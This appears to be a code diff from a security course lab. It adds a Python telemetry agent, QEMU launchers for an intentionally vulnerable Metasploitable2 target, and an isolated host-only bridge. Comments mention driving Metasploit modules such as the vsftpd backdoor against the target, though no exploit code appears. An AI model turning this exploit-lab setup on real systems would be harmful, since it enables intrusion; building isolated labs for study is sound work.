Stdlib only — no `psutil`, no extra deps to bake into the guest. Every
|
||||
field is read from /proc on the guest, so this works on busybox-based
|
||||
Alpine, on Cirros, and on Metasploitable2 unchanged.
|
||||
|
||||
Wire path inside the guest:
|
||||
/dev/virtio-ports/cis490.guest.agent
|
||||
|
||||
The host side opens the matching unix socket on the hypervisor.
|
||||
The protocol is intentionally trivial: the agent emits newline-
|
||||
delimited JSON; the host emits nothing back. One direction.
|
||||
|
||||
This source is the **deployable** side — every row is tagged
|
||||
``available_in_deployment: true``. See docs/threat-model.md.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import platform
|
||||
import sys
|
||||
import time
|
||||
from typing import Any
|
||||
|
||||
|
||||
SOURCE = "guest_agent"
|
||||
AVAILABLE_IN_DEPLOYMENT = True
|
||||
DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
|
||||
DEFAULT_INTERVAL_MS = 100 # 10 Hz
|
||||
DEFAULT_TOP_N = 8
|
||||
|
||||
|
||||
# ---------- /proc parsers ---------------------------------------------------
|
||||
|
||||
|
||||
def _read(path: str) -> str | None:
|
||||
try:
|
||||
with open(path, "rb") as f:
|
||||
return f.read().decode("ascii", errors="replace")
|
||||
except (FileNotFoundError, PermissionError):
|
||||
return None
|
||||
|
||||
|
||||
def read_loadavg() -> tuple[float, float, float] | None:
|
||||
text = _read("/proc/loadavg")
|
||||
if text is None:
|
||||
return None
|
||||
parts = text.split()
|
||||
return float(parts[0]), float(parts[1]), float(parts[2])
|
||||
|
||||
|
||||
def read_meminfo() -> dict[str, int]:
|
||||
text = _read("/proc/meminfo")
|
||||
out: dict[str, int] = {}
|
||||
if text is None:
|
||||
return out
|
||||
for line in text.splitlines():
|
||||
k, _, rest = line.partition(":")
|
||||
v = rest.strip()
|
||||
if v.endswith(" kB"):
|
||||
try:
|
||||
out[k] = int(v[:-3]) * 1024
|
||||
except ValueError:
|
||||
pass
|
||||
return out
|
||||
|
||||
|
||||
def read_cpu_total() -> dict[str, int] | None:
|
||||
"""First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
|
||||
in jiffies since boot."""
|
||||
text = _read("/proc/stat")
|
||||
if text is None:
|
||||
return None
|
||||
line = text.splitlines()[0]
|
||||
fields = line.split()
|
||||
# cpu user nice system idle iowait irq softirq steal guest guest_nice
|
||||
if not fields or fields[0] != "cpu":
|
||||
return None
|
||||
nums = [int(x) for x in fields[1:]]
|
||||
pad = nums + [0] * max(0, 10 - len(nums))
|
||||
return {
|
||||
"user": pad[0],
|
||||
"nice": pad[1],
|
||||
"system": pad[2],
|
||||
"idle": pad[3],
|
||||
"iowait": pad[4],
|
||||
"irq": pad[5],
|
||||
"softirq": pad[6],
|
||||
"steal": pad[7],
|
||||
"guest": pad[8],
|
||||
"guest_nice":pad[9],
|
||||
}
|
||||
|
||||
|
||||
def read_thermal_milli_c() -> int | None:
|
||||
"""Best-effort: /sys/class/thermal/thermal_zone0/temp."""
|
||||
text = _read("/sys/class/thermal/thermal_zone0/temp")
|
||||
if text is None:
|
||||
return None
|
||||
try:
|
||||
return int(text.strip())
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
|
||||
def read_net_devs() -> dict[str, dict[str, int]]:
|
||||
"""Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
|
||||
text = _read("/proc/net/dev")
|
||||
out: dict[str, dict[str, int]] = {}
|
||||
if text is None:
|
||||
return out
|
||||
lines = text.splitlines()
|
||||
for line in lines[2:]:
|
||||
if ":" not in line:
|
||||
continue
|
||||
name, _, rest = line.partition(":")
|
||||
name = name.strip()
|
||||
if name == "lo":
|
||||
continue
|
||||
cols = rest.split()
|
||||
if len(cols) < 16:
|
||||
continue
|
||||
out[name] = {
|
||||
"rx_bytes": int(cols[0]),
|
||||
"rx_pkts": int(cols[1]),
|
||||
"tx_bytes": int(cols[8]),
|
||||
"tx_pkts": int(cols[9]),
|
||||
}
|
||||
return out
|
||||
|
||||
|
||||
def read_listen_ports() -> list[int]:
|
||||
"""TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
|
||||
out: set[int] = set()
|
||||
for path in ("/proc/net/tcp", "/proc/net/tcp6"):
|
||||
text = _read(path)
|
||||
if not text:
|
||||
continue
|
||||
for line in text.splitlines()[1:]:
|
||||
cols = line.split()
|
||||
if len(cols) < 4:
|
||||
continue
|
||||
if cols[3] != "0A":
|
||||
continue
|
||||
local = cols[1] # "ADDR:PORT" with PORT in hex
|
||||
_, _, port_hex = local.rpartition(":")
|
||||
try:
|
||||
out.add(int(port_hex, 16))
|
||||
except ValueError:
|
||||
pass
|
||||
return sorted(out)
|
||||
|
||||
|
||||
def read_top_procs(top_n: int) -> list[dict[str, Any]]:
|
||||
"""Top-N processes by RSS. Cheap O(N) scan of /proc."""
|
||||
procs: list[dict[str, Any]] = []
|
||||
try:
|
||||
entries = os.listdir("/proc")
|
||||
except OSError:
|
||||
return procs
|
||||
for ent in entries:
|
||||
if not ent.isdigit():
|
||||
continue
|
||||
pid = int(ent)
|
||||
stat = _read(f"/proc/{pid}/stat")
|
||||
if stat is None:
|
||||
continue
|
||||
try:
|
||||
rparen = stat.rindex(")")
|
||||
comm = stat[stat.index("(") + 1 : rparen]
|
||||
fields = stat[rparen + 2:].split()
|
||||
utime = int(fields[11])
|
||||
stime = int(fields[12])
|
||||
rss_pages = int(fields[21])
|
||||
except (ValueError, IndexError):
|
||||
continue
|
||||
procs.append({
|
||||
"pid": pid,
|
||||
"comm": comm[:32],
|
||||
"cpu_jiffies": utime + stime,
|
||||
"rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
|
||||
})
|
||||
procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
|
||||
return procs[:top_n]
|
||||
|
||||
|
||||
# ---------- one tick --------------------------------------------------------
|
||||
|
||||
|
||||
def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
|
||||
mem = read_meminfo()
|
||||
cpu = read_cpu_total()
|
||||
load = read_loadavg()
|
||||
return {
|
||||
"t_guest_mono_ns": time.monotonic_ns(),
|
||||
"t_guest_wall_ns": time.time_ns(),
|
||||
"source": SOURCE,
|
||||
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||
"kernel": platform.release(),
|
||||
"cpu_total_jiffies": cpu,
|
||||
"load_1m_5m_15m": list(load) if load else None,
|
||||
"mem_total_bytes": (mem.get("MemTotal") or 0),
|
||||
"mem_available_bytes": (mem.get("MemAvailable") or 0),
|
||||
"mem_buffers_bytes": (mem.get("Buffers") or 0),
|
||||
"mem_cached_bytes": (mem.get("Cached") or 0),
|
||||
"swap_used_bytes": (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
|
||||
"thermal_milli_c": read_thermal_milli_c(),
|
||||
"net": read_net_devs(),
|
||||
"listen_ports": read_listen_ports(),
|
||||
"top_procs": read_top_procs(top_n),
|
||||
}
|
||||
|
||||
|
||||
# ---------- main loop -------------------------------------------------------
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-guest-agent")
|
||||
p.add_argument("--port", default=DEFAULT_PORT,
|
||||
help="virtio-serial port path inside the guest")
|
||||
p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
|
||||
p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
|
||||
p.add_argument("--once", action="store_true",
|
||||
help="emit a single row and exit (for smoke tests)")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
if args.once:
|
||||
sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
|
||||
sys.stdout.flush()
|
||||
return 0
|
||||
|
||||
# Open the virtio-serial port. If the host hasn't wired one up,
|
||||
# fall back to stdout so the agent is testable on bare-metal too.
|
||||
out_fp: Any
|
||||
if os.path.exists(args.port):
|
||||
out_fp = open(args.port, "wb", buffering=0)
|
||||
else:
|
||||
sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
|
||||
out_fp = sys.stdout.buffer
|
||||
|
||||
interval_ns = args.interval_ms * 1_000_000
|
||||
next_tick = time.monotonic_ns()
|
||||
try:
|
||||
while True:
|
||||
row = collect_once(args.top_n)
|
||||
out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
|
||||
try:
|
||||
out_fp.flush()
|
||||
except (AttributeError, OSError):
|
||||
pass
|
||||
next_tick += interval_ns
|
||||
sleep_ns = next_tick - time.monotonic_ns()
|
||||
if sleep_ns > 0:
|
||||
time.sleep(sleep_ns / 1_000_000_000)
|
||||
else:
|
||||
next_tick = time.monotonic_ns()
|
||||
except KeyboardInterrupt:
|
||||
return 0
|
||||
except (BrokenPipeError, OSError) as e:
|
||||
sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
|
||||
return 1
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
|
|
@ -16,7 +16,17 @@ set -euo pipefail
|
|||
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
|
||||
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
|
||||
CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
|
||||
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
|
||||
# SLOT lets the fleet runner spin up N concurrent VMs without socket /
|
||||
# port collisions. Default RUN_DIR + ssh hostfwd port keep single-VM
|
||||
# usage unchanged.
|
||||
SLOT="${SLOT:-0}"
|
||||
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
|
||||
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
|
||||
# When BRIDGE is set, attach a tap to the host-only bridge instead of
|
||||
# using SLIRP usermode networking. The tap must already exist and be a
|
||||
# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
|
||||
BRIDGE="${BRIDGE:-}"
|
||||
TAP="${TAP:-cis490tap$SLOT}"
|
||||
|
||||
mkdir -p "$RUN_DIR"
|
||||
QMP_SOCK="$RUN_DIR/qmp.sock"
|
||||
|
|
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
|
|||
exit 1
|
||||
fi
|
||||
|
||||
AGENT_SOCK="$RUN_DIR/agent.sock"
|
||||
|
||||
# snapshot=on routes guest writes through a temporary overlay so the qcow2
|
||||
# on disk is never mutated — every boot starts from the same bytes.
|
||||
#
|
||||
# Second virtio-serial port (cis490.guest.agent) carries telemetry
|
||||
# from the in-guest agent. Surfaces inside the guest at
|
||||
# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
|
||||
exec qemu-system-x86_64 \
|
||||
-name cis490-vm \
|
||||
-machine q35,accel=kvm \
|
||||
|
|
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
|
|||
-m 256 \
|
||||
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
|
||||
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
|
||||
-netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
|
||||
$(if [[ -n "$BRIDGE" ]]; then \
|
||||
echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
|
||||
else \
|
||||
echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
|
||||
fi) \
|
||||
-device virtio-net-pci,netdev=n0 \
|
||||
-device virtio-serial-pci,id=cis490vs0 \
|
||||
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
|
||||
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
|
||||
-nographic \
|
||||
-serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
|
||||
-monitor unix:"$MON_SOCK",server=on,wait=off \
|
||||
|
|
|
|||
117
vm/launch_target.sh
Executable file
117
vm/launch_target.sh
Executable file
|
|
@ -0,0 +1,117 @@
|
|||
#!/usr/bin/env bash
|
||||
# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
|
||||
# exploit fires against). Companion to ``launch_demo.sh``, which boots
|
||||
# the *idle* Alpine guest used in Tiers 1-2.
|
||||
#
|
||||
# Networking note: this launcher uses SLIRP usermode networking with
|
||||
# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
|
||||
# That gives us:
|
||||
# - the host can reach the guest's services (for msfrpcd + the
|
||||
# exploit module to drive ``RHOSTS=127.0.0.1``)
|
||||
# - the guest cannot reach the host or the internet (no NAT exit)
|
||||
#
|
||||
# The host-only ``br-malware`` bridge described in docs/architecture.md
|
||||
# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
|
||||
# at which point payloads with ``reverse_tcp`` callbacks become viable
|
||||
# too. Until then, we restrict module choices to ones that return a
|
||||
# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
|
||||
#
|
||||
# Run-dir contract (read by run_tier3_demo.py):
|
||||
# $RUN_DIR/qemu.pid
|
||||
# $RUN_DIR/qmp.sock
|
||||
# $RUN_DIR/monitor.sock
|
||||
# $RUN_DIR/serial.sock
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
|
||||
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
|
||||
SLOT="${SLOT:-0}"
|
||||
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
|
||||
RAM_MIB="${RAM_MIB:-512}"
|
||||
# When BRIDGE is set, attach a tap to the host-only bridge instead of
|
||||
# using SLIRP. Pcap-feature episodes (source 4) require this.
|
||||
BRIDGE="${BRIDGE:-}"
|
||||
TAP="${TAP:-cis490target$SLOT}"
|
||||
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
|
||||
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
|
||||
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
|
||||
PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
|
||||
TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
|
||||
# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
|
||||
# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
|
||||
ACCEL="${ACCEL:-}"
|
||||
|
||||
mkdir -p "$RUN_DIR"
|
||||
QMP_SOCK="$RUN_DIR/qmp.sock"
|
||||
MON_SOCK="$RUN_DIR/monitor.sock"
|
||||
PID_FILE="$RUN_DIR/qemu.pid"
|
||||
SERIAL_SOCK="$RUN_DIR/serial.sock"
|
||||
|
||||
if [[ ! -f "$IMAGE" ]]; then
|
||||
cat >&2 <<EOF
|
||||
no target image at $IMAGE
|
||||
|
||||
Drop a vulnerable Linux qcow2 there. The canonical choice is
|
||||
Metasploitable2 — see docs/sources.md for the download + sha256.
|
||||
|
||||
If the image is x86 and your host is not, set ACCEL=tcg explicitly.
|
||||
EOF
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Build the netdev string. With BRIDGE set we use a tap on the host-only
|
||||
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
|
||||
# usermode + restrict=on for the no-egress smoke runs.
|
||||
if [[ -n "$BRIDGE" ]]; then
|
||||
NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
|
||||
else
|
||||
NETDEV="user,id=n0,restrict=on"
|
||||
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
|
||||
for pair in "${_PAIRS[@]}"; do
|
||||
host_port="${pair%%:*}"
|
||||
guest_port="${pair##*:}"
|
||||
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
|
||||
done
|
||||
fi
|
||||
|
||||
# Pick acceleration: explicit override wins; otherwise use KVM if the
|
||||
# device is present, else TCG.
|
||||
if [[ -z "$ACCEL" ]]; then
|
||||
if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
|
||||
ACCEL="kvm"
|
||||
else
|
||||
ACCEL="tcg"
|
||||
fi
|
||||
fi
|
||||
|
||||
CPU_FLAGS=()
|
||||
if [[ "$ACCEL" == "kvm" ]]; then
|
||||
CPU_FLAGS=(-cpu host)
|
||||
fi
|
||||
|
||||
AGENT_SOCK="$RUN_DIR/agent.sock"
|
||||
|
||||
# snapshot=on so the qcow2 is never mutated — every boot is identical.
|
||||
# Second virtio-serial port carries the in-guest agent's telemetry to
|
||||
# the host (see vm/guest-agent/). Targets without the agent installed
|
||||
# (e.g. unmodified Metasploitable2) leave the device unused — the
|
||||
# host-side collector simply gets no rows. Harmless.
|
||||
exec qemu-system-x86_64 \
|
||||
-name cis490-target \
|
||||
-machine q35,accel="$ACCEL" \
|
||||
"${CPU_FLAGS[@]}" \
|
||||
-smp 1,sockets=1,cores=1,threads=1 \
|
||||
-m "$RAM_MIB" \
|
||||
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
|
||||
-netdev "$NETDEV" \
|
||||
-device virtio-net-pci,netdev=n0 \
|
||||
-device virtio-serial-pci,id=cis490vs0 \
|
||||
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
|
||||
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
|
||||
-nographic \
|
||||
-serial unix:"$SERIAL_SOCK",server=on,wait=off \
|
||||
-monitor unix:"$MON_SOCK",server=on,wait=off \
|
||||
-qmp unix:"$QMP_SOCK",server=on,wait=off \
|
||||
-pidfile "$PID_FILE" \
|
||||
-display none
|
||||
56
vm/setup_bridge.sh
Executable file
56
vm/setup_bridge.sh
Executable file
|
|
@ -0,0 +1,56 @@
|
|||
#!/usr/bin/env bash
|
||||
# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
|
||||
#
|
||||
# Properties (from docs/architecture.md):
|
||||
# - Bridge address 10.200.0.1/24 on the host side.
|
||||
# - NO NAT, NO route, NO DNS — guests cannot reach the host or the
|
||||
# internet. The bridge only carries traffic between the host and
|
||||
# the guests on it.
|
||||
# - Lab-host and target VMs both attach via tap devices created by
|
||||
# the launcher.
|
||||
#
|
||||
# Run as root, ONCE per host. Idempotent — re-running is safe.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
BRIDGE="${BRIDGE:-br-malware}"
|
||||
BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"
|
||||
|
||||
log() { printf '[setup_bridge] %s\n' "$*" >&2; }
|
||||
|
||||
[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }
|
||||
|
||||
if ! command -v ip >/dev/null; then
|
||||
log "iproute2 (`ip`) is required"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
|
||||
log "creating bridge $BRIDGE"
|
||||
ip link add name "$BRIDGE" type bridge
|
||||
# Disable spanning-tree on the host-only bridge — it isn't needed
|
||||
# and adds startup delay.
|
||||
ip link set "$BRIDGE" type bridge stp_state 0
|
||||
fi
|
||||
|
||||
ip link set "$BRIDGE" up
|
||||
|
||||
# Add the host-side address if not already there.
|
||||
if ! ip -4 addr show dev "$BRIDGE" | grep -q "${BRIDGE_IP%%/*}"; then
|
||||
log "adding $BRIDGE_IP to $BRIDGE"
|
||||
ip addr add "$BRIDGE_IP" dev "$BRIDGE"
|
||||
fi
|
||||
|
||||
# Make sure the kernel does NOT forward between this bridge and any
|
||||
# other interface. We don't want a misconfigured net.ipv4.ip_forward
|
||||
# to leak the malware bridge to the LAN.
|
||||
if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
|
||||
log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
|
||||
log "blocks traffic from $BRIDGE to non-loopback devices."
|
||||
fi
|
||||
|
||||
log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
|
||||
log ""
|
||||
log "Launchers can now opt into tap+bridge mode by setting:"
|
||||
log " BRIDGE=$BRIDGE (tells launch_target.sh to attach a tap to this bridge)"
|
||||
log "Default launcher behaviour stays SLIRP usermode for simplicity."
|
||||
Loading…
Add table
Reference in a new issue